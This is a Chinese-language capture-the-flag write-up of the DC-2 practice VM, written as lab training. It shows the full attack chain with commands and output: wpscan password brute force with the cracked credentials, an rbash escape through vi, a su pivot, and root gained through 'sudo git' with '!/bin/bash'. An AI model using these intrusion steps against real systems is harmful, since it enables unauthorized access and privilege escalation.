【offensive-security】3.DC-2靶机
一、获取靶机信息
1.已知信息:
- IP: 192.168.245.193
2.获取信息:
- nmap扫描开启的服务
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# nmap -p "*" -A 192.168.245.194
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 19:25 CST
Nmap scan report for dc-2 (192.168.245.194)
Host is up (0.30s latency).
Not shown: 8349 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
开了一个80端口,一个7744的ssh端口,先看web,直接用IP访问的话访问不上,会跳到http://dc-2,我们需要修改/etc/hosts文件,修改http://dc-2的本地缓存
修改hosts:
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# cat /etc/hosts
127.0.0.1 localhost
192.168.245.194 dc-2
修改完后重启networking服务,/etc/init.d/networking restart
在首页发现了第一个flag提示
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
你通常的字典可能行不通,所以,也许你只需要保持冷静。
更多的密码总是更好的,但有时你只是不能赢得所有的密码。
以个人身份登录以查看下一个标志。
如果找不到,请以其他身份登录。
3.爆破WP用户名及密码
看样子是要我们爆破,但是又告诉我们平常的字典没用,于是看到关键字cewl,这个工具可以爬取网站并保存相关关键字作为字典,使用指南:kali密码攻击工具——Cewl使用指南 | 码农网 (codercto.com)
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# cewl http://dc-2/ -w Desktop/wp2.txt #将爬取到的字典保存到wp2.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
有了密码字典,还需要知道有哪些用户名,上wpscan神器:
┌──(lo0p㉿0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:39:38 2022
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Oct 26 19:40:07 2022
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.614 KB
[+] Data Received: 514.805 KB
[+] Memory used: 207.809 MB
[+] Elapsed time: 00:00:28
用户名字典也有了,我们保存到桌面user.txt上,tom、jerry、admin 一行一个
┌──(lo0p㉿0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -U user.txt -P wp2.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:42:16 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
| - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:03:22 <============================================================================================== > (646 / 1121) 57.62% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Oct 26 19:45:55 2022
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 252.957 MB
[+] Elapsed time: 00:03:39
拿到了tom和jerry的密码,我们尝试登录后台,WEB页面上没有登录入口,我们去目录爆破获取:
┌──(root㉿0xlo0p)-[/home/lo0p]
└─# dirsearch -u http://dc-2/ -e * -x 403 404
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: | HTTP method: GET | Threads: 30 | Wordlist size: 9009
Output File: /root/.dirsearch/reports/dc-2/-_22-10-26_16-51-46.txt
Error Log: /root/.dirsearch/logs/errors-22-10-26_16-51-46.log
Target: http://dc-2/
[16:51:57] Starting:
[16:53:10] 301 - 0B - /index.php -> http://dc-2/
[16:53:16] 200 - 19KB - /license.txt
[16:53:35] 200 - 7KB - /readme.html
[16:53:49] 301 - 299B - /wp-admin -> http://dc-2/wp-admin/
[16:53:50] 200 - 0B - /wp-content/
[16:53:50] 200 - 0B - /wp-config.php
[16:53:50] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[16:53:50] 200 - 1B - /wp-admin/admin-ajax.php
[16:53:50] 302 - 0B - /wp-admin/ -> http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:53:50] 500 - 0B - /wp-content/plugins/hello.php
[16:53:50] 500 - 4KB - /wp-admin/setup-config.php
[16:53:50] 200 - 1KB - /wp-admin/install.php
[16:53:50] 301 - 301B - /wp-content -> http://dc-2/wp-content/
[16:53:50] 500 - 0B - /wp-includes/rss-functions.php
[16:53:50] 200 - 0B - /wp-cron.php
[16:53:50] 200 - 2KB - /wp-login.php
[16:53:50] 302 - 0B - /wp-signup.php -> http://dc-2/wp-login.php?action=register
[16:53:51] 301 - 302B - /wp-includes -> http://dc-2/wp-includes/
[16:53:51] 405 - 42B - /xmlrpc.php
[16:53:53] 200 - 40KB - /wp-includes/
Task Completed
拿到uri: /wp-login.php
我们登录上后台,tom用户没任何发现,但是jerry发现了flag提示:
If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
如果你不能利用WordPress并采取快捷方式,还有另一种方法。
希望你找到了另一个切入点。
这里提示我们WP的exp我们是一个都用不了,经msf实验确实如此,那我们还有什么切入点呢?回顾开始到现在,好像还有ssh可以利用,我们可以尝试ssh爆破,但是我们可以先试试使用tom和jerry的密码试试(jerry经测试不行,但是可以用tom登录):
┌──(lo0p㉿0xlo0p)-[~]
└─$ ssh [email protected] -p 7744
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 26 07:10:05 2022 from 192.168.49.245
tom@DC-2:~$ whoami
-rbash: whoami: command not found
但是只有rbash的权限,能执行的命令限制了很多,这个时候就需要rbash逃逸
4.rbash逃逸
具体原理:(71条消息) 【渗透测试】--- rbash逃逸方法简述_通地塔的博客-CSDN博客
首先看下能执行哪些命令:
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ echo /home/tom/usr/bin/*
/home/tom/usr/bin/less /home/tom/usr/bin/ls /home/tom/usr/bin/scp /home/tom/usr/bin/vi
根据上面分享的文章,我们可以利用vi来启动bash
- vi xxx #进入vi界面
- :set shell=/bin/bash
- :shell
启动到bash以后,我们仍然无法执行其他命令,因为PATH环境变量没设置对,设置如下:
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin:/bin/:/usr/bin/
tom@DC-2:~$ whoami
tom
查看tom的home目录,我们发现了flag3提示:
tom@DC-2:~$ ls
flag3.txt local.txt usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
看提示,我们需要从tom用户su到jerry用户,密码和wpscan爆破出来的一样:
tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt h
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
在jerry的home目录下发现了flag4提示,前面三行说废话,但是最后一行的git非常显眼,我们需要尝试提权。
5.GIT提权
- 查找具有SUID的二进制文件(没找到能用的)
jerry@DC-2:~$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
- 查看当前的权限
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
看来只能根据提示使用git提权,我们上https://gtfobins.github.io/ 查找git的提权利用
1.sudo git help config
2.输入 !/bin/bash
成功拿到root权限:
root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt proof.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
root@DC-2:~# cat proof.txt
0d359f3e1b67060936ce02bada010328